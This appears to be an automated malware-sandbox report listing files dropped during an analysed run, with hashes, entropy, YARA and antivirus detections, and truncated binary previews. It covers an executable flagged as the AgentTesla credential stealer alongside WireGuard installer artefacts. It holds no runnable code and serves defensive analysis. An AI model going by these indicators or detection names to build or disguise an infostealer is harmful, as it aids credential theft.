Process:	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	modified
Size (bytes):	61371
Entropy (8bit):	7.673632683102563
Encrypted:	false
SSDEEP:	1536:bUcDEQsoj4TGHpRxQBtfVV2flPx0k5kW7NVlakK51P:QcIZyqqR0f2NCk5XNVLUZ
MD5:	AFB0361ABC089484FF11A7563D89E570
SHA1:	DCA3A2FEAC82069C8E46D454B7EA296A50F26BD9
SHA-256:	BB5CD838764B922018B1361B799BB1508FB0545AFB272451E6BD5C616CB03A34
SHA-512:	6D5889D73BD22F319180C69DAA069C89D0623D652C0B83D59F823CD3C88AA7CFC6A30E9AD5A6046903E1E48AB425A6CD9EFA982800EA20F5008D7ED8B03AADA5
Malicious:	false
Preview:	......JFIF.....`.`.....C................(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..h....`.U.m...5.T$Lp$s.~...*.:=.s4.)._.......c...3.X...~...6..i....l?...9..f=.=...\|...$p~...j.%.Q@.E.R....?....G._#........b_......g....5.S.q.......b_......N......22n.3.......%..h.....(.(........X.I{.3...U....v.W9.+.?............N...<e........./...k....f...e.&........vFG(....j..%.....S.....J+G....kv...Z)....@...#C...2....R....W.............n\|...U.9U..

C:\Users\user\AppData\Roaming\audddd\audddd.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	187392
Entropy (8bit):	5.529352384774886
Encrypted:	false
SSDEEP:	3072:1ZGaTHmQUtUHQkH+wWtaiQGlIQZboLRF9ua/aHyvZRGd2ite:1ZjqQU4j7xGlVbA
MD5:	64A509A5D856C0E1BC482E64E5EA8556
SHA1:	AC04F5364CE8DF715BC99F9D7BAE5725C18DDE59
SHA-256:	D366F0980A9C490F3A9A2C6A7680D011899F345FD2D0BDC5C1642B436BBAB262
SHA-512:	D424681E9398409DB1846303E06B873DE9BED8644C627DF798BB90094AACE358432B2E302E0A0A20B703A231023BA0F9A6AC603DD34D82417070E363C6AB917A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pa.e................................. ........@.. .......................@............@.................................H...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......d................k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Windows\Installer\51c6ff.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: WireGuard: Fast, Modern, Secure VPN Tunnel, Author: WireGuard LLC, Keywords: Installer, Comments: This installer database contains the logic and data required to install WireGuard., Template: x64;1033, Revision Number: {51929F59-526D-4355-9FAE-F30E76139FBB}, Create Time/Date: Wed Dec 22 17:51:10 2021, Last Saved Time/Date: Wed Dec 22 17:51:10 2021, Number of Pages: 500, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.0.4118), Security: 4
Category:	dropped
Size (bytes):	2842624
Entropy (8bit):	7.78971965339623
Encrypted:	false
SSDEEP:	49152:PqTylf8vOWs5nECHMUWvO5Gg5mlx10bo:PqWlOOWs5E7U0ib52Ebo
MD5:	7B284C4A07504FACAD872FBC4348B663
SHA1:	1C88B528F51BFDFF964580567860DE85BBB7363D
SHA-256:	76FCEC042C5989C5B816CD32EAED1E5B1C3B998A4B1C9ECA55F299E3314EF7E4
SHA-512:	FDB8A2FBE22F80331114DB09B297FCB19D870BFBED2D49CC567B3DF8D179D5B47774CC915BED7CF78D8B5A716645CA11ECD019126F35E10839DA631C6AF0EC77
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\51c702.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: WireGuard: Fast, Modern, Secure VPN Tunnel, Author: WireGuard LLC, Keywords: Installer, Comments: This installer database contains the logic and data required to install WireGuard., Template: x64;1033, Revision Number: {51929F59-526D-4355-9FAE-F30E76139FBB}, Create Time/Date: Wed Dec 22 17:51:10 2021, Last Saved Time/Date: Wed Dec 22 17:51:10 2021, Number of Pages: 500, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.0.4118), Security: 4
Category:	dropped
Size (bytes):	2842624
Entropy (8bit):	7.78971965339623
Encrypted:	false
SSDEEP:	49152:PqTylf8vOWs5nECHMUWvO5Gg5mlx10bo:PqWlOOWs5E7U0ib52Ebo
MD5:	7B284C4A07504FACAD872FBC4348B663
SHA1:	1C88B528F51BFDFF964580567860DE85BBB7363D
SHA-256:	76FCEC042C5989C5B816CD32EAED1E5B1C3B998A4B1C9ECA55F299E3314EF7E4
SHA-512:	FDB8A2FBE22F80331114DB09B297FCB19D870BFBED2D49CC567B3DF8D179D5B47774CC915BED7CF78D8B5A716645CA11ECD019126F35E10839DA631C6AF0EC77
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC895.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC8E4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC943.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	474949
Entropy (8bit):	5.215417476731593
Encrypted:	false
SSDEEP:	6144:H5pfn/m5pfn/e5pfn/3hCuF4LTu9xsniNS4DrY:Zpfn/Mpfn/kpfn/3YuFhODOs
MD5:	C33C4FD08B776DE03ABDC2F27EE420CC
SHA1:	2626D9475BBFA9936DEA4B5EEAA9ABDDE6FE1023
SHA-256:	D8F37CD9BFA787AA0C47D67EEA4E9EFF5B5F7C34A1D48DF6E6306CB031A719DB
SHA-512:	1A05C3DEFBA9099C3957417AB751954A64E062DB0E65D7B93811DE25443939AD481301E5C168AD0D99FFD1B717BE20A1A657043DFE54F819E5E290DA00CAC45F
Malicious:	false
Preview:	...@IXOS.@.....@a.CW.@.....@.....@.....@.....@.....@......&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}..WireGuard@.4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.@.....@.....@.....@......wireguard.ico..&.{51929F59-526D-4355-9FAE-F30E76139FBB}.....@.....@.....@.....@.......@.....@.....@.......@......WireGuard......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{C3508D23-3362-47CE-9220-321BDB1A1ACC}(.C:\Program Files\WireGuard\wireguard.exe.@.......@.....@.....@......&.{540CF446-FCC3-4452-B9FB-EB4C02780251}!.C:\Program Files\WireGuard\wg.exe.@.......@.....@.....@........KillWireGuardProcesses....J...KillWireGuardProcesses.@......X...MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&..........................................................

C:\Windows\Installer\MSIC944.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC9A4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC9E3.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIC9F4.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	35672
Entropy (8bit):	6.381312055689448
Encrypted:	false
SSDEEP:	768:zEP4jRZ59l3i691zZRlpQ64KxnVbwCn8DHSgK/YsnZ:vRB915pQhKxn+3ygK/fnZ
MD5:	457659D4D9C2058D1FCA89DBC40C999B
SHA1:	0C50D8E9127916409C150046A5ADE7421D9B4C70
SHA-256:	F98350383A6A65079F742A03D38D04227EF7F045FC8D6844C3B1D087734C1DA6
SHA-512:	98554DE9A26B3FD358AF3379C067C3E9ED275F9B79492B25FB318919ECD205F4D21F23DE84651C2A5576A27A38CE2B6F5B77C306B537B11430FD257F7709DF2E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....e.a.........." .........&............................................................`..........................................O......(P...............p..P....X..X3......P...........................XM..(...................@S...............................text....,.......................... ..`.rdata.......@.......2..............@..@.data........`.......P..............@....pdata..P....p.......R..............@..@.tls.................T..............@....reloc..P............V..............@..B........................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDF42.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	545
Entropy (8bit):	5.226140436075752
Encrypted:	false
SSDEEP:	12:EgixLBl+bGviS9BTZjpkj//xAXfNEShQpGug24Sl:6xLB4SNZj2jBAiShQpGFRW
MD5:	90622C65E087D27DE3F93466700DFB8C
SHA1:	E69D959991900DDFE08453B3D396D3B55C0FFCDA
SHA-256:	8F76B65364799AB2C69BC7FF21BDE6427441F6CBB1D7DA0A17D6F22B07D8B478
SHA-512:	D394E3E95F275297C3B3F8AC430015E28ABF994C4D9D87CA24FD3FF287F4625906366D4306CE5F0DB02D7B40DEF18A4D529515AC02A9AD3400091E7E844AED3A
Malicious:	false
Preview:	...@IXOS.@.....@d.CW.@.....@.....@.....@.....@.....@......&.{2FDB79CE-5193-4A39-82BB-E00158CC1533}..WireGuard@.4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4.@.....@.....@.....@......wireguard.ico..&.{51929F59-526D-4355-9FAE-F30E76139FBB}.....@.....@.....@.....@.......@.....@.....@.......@......WireGuard......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........LaunchApplication....J...LaunchApplication.@.,..(.C:\Program Files\WireGuard\wireguard.exe...@.....@.....@....

C:\Windows\Installer\SourceHash{2FDB79CE-5193-4A39-82BB-E00158CC1533}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.193932947297275
Encrypted:	false
SSDEEP:	12:JSbX72FjVCXAlfLIlHmRp7h+7777777777777777777777777ZDHFFrqO95qS91X:JcUIY6P3bL1WxF
MD5:	C4B64EE297A57B2124097716029C9922
SHA1:	B511DCD3C179A0C05387B30258EB1EB10B5EEB9E
SHA-256:	8599832534EEB0B832401D257A944F101B332E152421A07125DF8A80584EEDA2
SHA-512:	323753C77DCC7D553AB11FFEDD4C8C3C97F314B2E5DF2559A491FB992CE2A8A49F0AD65E6CB1B7D3230C3B7AA0518288CD9444868E9E814E704F4145927E14AF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.424379631023187
Encrypted:	false
SSDEEP:	48:ZR8PhSuRc06WX4iFT5pgaoXqQxGg7S5okqSIR78D:+hS1yFTo/XqQxGC1BK
MD5:	A870959CB697B15B8BE46A803CD8B7FD
SHA1:	3B8BB9FD538F816BEC32F8A3A25F3F3AC5585E54
SHA-256:	FE33BB36DCB40465344921EE64AE8DDCB249B8725C5FEA24A27AC0E024CF26EB
SHA-512:	2F1EE4F90A5BE89184FD8275A415DFD2D294D1784B691AA9237B19CD98A688D4ED36E11211C9B95F50E51A189DB94E62C80C4FC63D432A25D130910D1D5A08E2
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\{2FDB79CE-5193-4A39-82BB-E00158CC1533}\wireguard.ico

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	MS Windows icon resource - 11 icons, 256x256 with PNG image data, 256 x 256, 16-bit/color RGBA, non-interlaced, 32 bits/pixel, -64x-64, 32 bits/pixel
Category:	dropped
Size (bytes):	365273
Entropy (8bit):	4.4966936455964985
Encrypted:	false
SSDEEP:	3072:zhCuAo4LsUokIau9UUsnz+NSMfD9H5+E:zhCuF4LTu9xsniNS4Dr
MD5:	FB4774A7B100EF11E2B1AFEE3E4C5DAF
SHA1:	89B38ADFD681B352CB412C2830E5BB0F17B15455
SHA-256:	1F272F0475B91F9E44FC721DB6228809C41C5693380512BB31437B003B3D7C98
SHA-512:	787C5BDF63A41232EDCB2B77B5274E3D91694CAB931489547D5EC659C408DD06BC16D97FE28D370CD52FB13F07673C68278ADF80888E4525342E9C6AF25F9DF9
Malicious:	false
Preview:	............ ............... .(R..Y......... .(....N..``.... ......V..@@.... .(B..Q...00.... ..%..y-..((.... .h...!S.. .... ......m........ .....1~........ ............... .h...q....PNG........IHDR...............t%....IDATx..u.....;olw...tww..4R.....(.R".....(R...tww.6.......D.~...;..,...9w.9.s.9...\.8..,...^...B{DJ...<%.J~...D(..\..0.....p.3....V9..)..3..6..T]m..zQ..W'U^U.6QV.%...b.X..#.{.s.#.u...[Dz...}0x- B.......w...x.8.....*.kT..m.......N"P).8...(yt].G.a..:..ec.T..p.h%...R...n#.0.`....Qn.......@/..WL...H..+..`+........Z.R.$..K....D#...b......\|.^.....-.8.........;v.0.4..bi.;}.N.H..qKzMt..H..V.Q..qc...X.p..A,w..._...Qx..5r.h..g...WDo.)8..8M;..(.e?P+.I6..n.{#....Bd......h..F.dF...C..C.w.A&tM.oj...7....,...5..e&.M.<...v..>$....6..?P.Sb.....d9#oU.SB......K.\|[.....8..I$.9.z.G.e.kG$.E>.s$...s~.q.f.7.<.! ...]f>...6.O....>'....O..Y....M6.#N..H,i'..$..x..X...<:...J..I6...)q%.e8...$.H..7h$.r..^>.#y....O/6.#N...E$..4Jk."j..).G.I..o..8......0..@...

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	299909
Entropy (8bit):	5.3945780207753335
Encrypted:	false
SSDEEP:	3072:pJIBzZKyiBJLSNdN8TsQWPDrq3bmBWIp8ahfl5f4XFst145hDU2qNXhdFNZHyVQh:uZJYkx
MD5:	6F505294E0DC634028C58FE6233EC26D
SHA1:	9F3F8105668D32652063C425C15307C1B72A7B52
SHA-256:	B1BEE020756AF8ECF7E95502B62717C5E2FA9C4ABD3287526A5662BB4483DB1D
SHA-512:	E670E277E771F8C2D0C7A94386BE7DBA49F6F5E2A60FF769DD40943FE009F0B4805033FAA050C08AB3D789CFC721D0E4E5C90B16B74FFAA208DD4700704F5693
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 03:22:38.143 [320]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.159 [320]: ngen returning 0x00000000..07/23/2020 03:22:38.222 [3748]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Word, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.237 [3748]: ngen returning 0x00000000..07/23/2020 03:22:38.284 [64]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Common.Implementation, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 03:22:38.300 [64]:

C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4

Download File

Process:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: WireGuard: Fast, Modern, Secure VPN Tunnel, Author: WireGuard LLC, Keywords: Installer, Comments: This installer database contains the logic and data required to install WireGuard., Template: x64;1033, Revision Number: {51929F59-526D-4355-9FAE-F30E76139FBB}, Create Time/Date: Wed Dec 22 17:51:10 2021, Last Saved Time/Date: Wed Dec 22 17:51:10 2021, Number of Pages: 500, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.14.0.4118), Security: 4
Category:	dropped
Size (bytes):	2842624
Entropy (8bit):	7.78971965339623
Encrypted:	false
SSDEEP:	49152:PqTylf8vOWs5nECHMUWvO5Gg5mlx10bo:PqWlOOWs5E7U0ib52Ebo
MD5:	7B284C4A07504FACAD872FBC4348B663
SHA1:	1C88B528F51BFDFF964580567860DE85BBB7363D
SHA-256:	76FCEC042C5989C5B816CD32EAED1E5B1C3B998A4B1C9ECA55F299E3314EF7E4
SHA-512:	FDB8A2FBE22F80331114DB09B297FCB19D870BFBED2D49CC567B3DF8D179D5B47774CC915BED7CF78D8B5A716645CA11ECD019126F35E10839DA631C6AF0EC77
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF109E1B9A594400A7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.08737803215873398
Encrypted:	false
SSDEEP:	24:LvDiJNR78OipVvipV7V2BWGQZkZ8+E+VTEIAqQxJ:UNR78OS9S5okw87aoXqQxJ
MD5:	E10692B66D27D729F12312FD3CAC5DBE
SHA1:	D7CC809064B20CD32107E533D436919DE02A4C43
SHA-256:	8DFD3BB8A52AAD42D40DCB3D0C92ED9A3DFA45C97BBF12996980A376049BAE0E
SHA-512:	96142325FC2D8E9AB2B0F51FEFD21A50027A222691169C8F5408F91E1519DD543DB0AEDAF63306BE98E5FC14365211CC40F560DFAFA204CDC569BFCF99418986
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2CFDAA25AED995A8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1511419018185869
Encrypted:	false
SSDEEP:	48:Nnr6u1O+xFX4zT5ngaoXqQxGg7S5okqSIR78D:h6OwTm/XqQxGC1BK
MD5:	820B4BA461743698121835FE3400025E
SHA1:	2535EF824BE47B3D23B7F2C423D82019383C2F75
SHA-256:	383420E9A0F2DAC8C32219BC891F18FD494A539E78C91C595BABCEC92434AB8D
SHA-512:	2E265675E3D3EFE8498D46A6A44C39F08B5A3C211740909C6342D501889984FCA2FC1E5D1DA5363D55E259D91392BD3DDBB4BE64FD6096C2BCD62CFF30F6277D
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF52A798DEE3710C60.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5F2F05EBE6BBA8A2.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6FAA043F1C1E7576.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1511419018185869
Encrypted:	false
SSDEEP:	48:Nnr6u1O+xFX4zT5ngaoXqQxGg7S5okqSIR78D:h6OwTm/XqQxGC1BK
MD5:	820B4BA461743698121835FE3400025E
SHA1:	2535EF824BE47B3D23B7F2C423D82019383C2F75
SHA-256:	383420E9A0F2DAC8C32219BC891F18FD494A539E78C91C595BABCEC92434AB8D
SHA-512:	2E265675E3D3EFE8498D46A6A44C39F08B5A3C211740909C6342D501889984FCA2FC1E5D1DA5363D55E259D91392BD3DDBB4BE64FD6096C2BCD62CFF30F6277D
Malicious:	false
